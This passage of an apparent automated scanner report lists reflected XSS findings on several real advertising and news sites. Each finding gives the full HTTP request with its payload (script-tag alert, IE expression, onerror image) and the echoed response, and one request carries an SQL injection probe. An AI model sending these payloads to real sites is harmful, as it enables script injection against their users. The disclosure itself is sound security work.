HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 921
Date: Sat, 17 Sep 2011 16:29:42 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hpda65d';62c2a31a931;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x27;kw=org;ord=1316294750105?" type="text/javascript">
...[SNIP]...
4.363. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46dbb"style%3d"x%3aexpression(alert(1))"f1bd2ce5b6a was submitted in the sz parameter. This input was echoed as 46dbb"style="x:expression(alert(1))"f1bd2ce5b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x2746dbb"style%3d"x%3aexpression(alert(1))"f1bd2ce5b6a&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 1008
Date: Sat, 17 Sep 2011 16:29:59 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x2746dbb"style="x:expression(alert(1))"f1bd2ce5b6a;kw=org;ord=1316294750105?" target="_blank">
...[SNIP]...
4.364. http://www.local.com/dart/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47408'%3bd1c04823920 was submitted in the sz parameter. This input was echoed as 47408';d1c04823920 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x2747408'%3bd1c04823920&ord=1316294750105&l=Dallas%2c+TX&zip=75201&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 921
Date: Sat, 17 Sep 2011 16:30:01 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_75201;sz=163x2747408';d1c04823920;kw=org;ord=1316294750105?" type="text/javascript">
...[SNIP]...
4.365. http://www.local.com/dart/ [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ca9b'-alert(1)-'ff68606629 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&css=sponsored-by&p=locm.hp&sz=163x27&ord=1316294750105&l=Dallas%2c+TX&zip=752016ca9b'-alert(1)-'ff68606629&kw=org HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=44c9c39a-4272-427f-9062-ee5347fb6ff4; localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=338bc794-e584-489b-ac20-1670e91abec0&expdate=634544402771604950

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 948
Date: Sat, 17 Sep 2011 16:31:05 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.hp;dcopt=ist;kw=;pos=;tile=;city=dallas_tx_752016ca9b'-alert(1)-'ff68606629;sz=163x27;kw=org;ord=1316294750105?" type="text/javascript">
...[SNIP]...
4.366. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The value of the yahoo_token request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 51c4d'><script>alert(1)</script>01933e231e3 was submitted in the yahoo_token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: __utma=1.519244467.1316296143.1316296143.1316296143.1; __utmb=1; __utmc=1; __utmz=1.1316296143.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Content-Type: application/x-www-form-urlencoded
Content-Length: 873

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
optThis=63&optThis=64&optThis=65&optThis=66&optThis=67&optThis=68&optThis=69&optThis=70&optThis=71&optThis=72&optThis=73&optThis=74&optThis=75&AOLOptThis=1&TribalOptThis=1&yahoo_token=VjRBR0ZmS3AyMFQ-51c4d'><script>alert(1)</script>01933e231e3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 17:43:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Fri, 16 Sep 2011 17:43:14 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src='http://info.yahoo.com/nai/optout.html?token=VjRBR0ZmS3AyMFQ-51c4d'><script>alert(1)</script>01933e231e3' width=15 height=15>
...[SNIP]...
4.367. http://www.stamfordadvocatedailydeals.com/widgets/widget [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stamfordadvocatedailydeals.com
Path:   /widgets/widget

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8b07<img%20src%3da%20onerror%3dalert(1)>be39df5f2e2 was submitted in the REST URL parameter 2. This input was echoed as c8b07<img src=a onerror=alert(1)>be39df5f2e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /widgets/widgetc8b07<img%20src%3da%20onerror%3dalert(1)>be39df5f2e2 HTTP/1.1
Host: www.stamfordadvocatedailydeals.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Sat, 17 Sep 2011 16:12:41 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 79

Could not find the template: widgetc8b07<img src=a onerror=alert(1)>be39df5f2e2
4.368. http://adnxs.revsci.net/imp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc6e6'-alert(1)-'2b38f39a476 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=937499&r=1&_salt=1172267925&u=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=cc6e6'-alert(1)-'2b38f39a476
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 16:26:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:26:59 GMT
Content-Length: 504

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.google.com/search%3Fhl=en%26q=cc6e6'-alert(1)-'2b38f39a476&inv_code=937499&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D937499%26r%3D1%26_salt%3D1172267925%26u%3Dhttp%253A%252F%252Fwww.seattlep
...[SNIP]...
4.369. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccfa1"-alert(1)-"27bcc122769 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=24537&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ccfa1"-alert(1)-"27bcc122769
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DB149A370CF11F4EDD6087C6FED4F09C; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:48 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=ccfa1"-alert(1)-"27bcc122769",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=24537&campId=176617",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000
...[SNIP]...
4.370. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_ad_us-ec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4f22'><script>alert(1)</script>11676609472 was submitted in the token_nai_ad_us-ec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=f4f22'><script>alert(1)</script>11676609472; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13676


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=1005334&token=f4f22'><script>alert(1)</script>11676609472' height='1' width='1'>
...[SNIP]...
4.371. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserver_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ec37'><script>alert(1)</script>790c46cb35f was submitted in the token_nai_adserver_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1ec37'><script>alert(1)</script>790c46cb35f; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:23:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13676


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=1383829&token=1ec37'><script>alert(1)</script>790c46cb35f' height='1' width='1'>
...[SNIP]...
4.372. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e9ad'><script>alert(1)</script>a7959d34e8e was submitted in the token_nai_adserverec_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=2e9ad'><script>alert(1)</script>a7959d34e8e; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:24:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13676


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6868016&token=2e9ad'><script>alert(1)</script>a7959d34e8e' height='1' width='1'>
...[SNIP]...
4.373. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adserverwc_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fd526'><script>alert(1)</script>a71d8173716 was submitted in the token_nai_adserverwc_adtechus_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=fd526'><script>alert(1)</script>a71d8173716; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:24:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13678


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=1452648&token=fd526'><script>alert(1)</script>a71d8173716' height='1' width='1'>
...[SNIP]...
4.374. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of the token_nai_adsonar_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3801'><script>alert(1)</script>d13b84e748b was submitted in the token_nai_adsonar_com cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
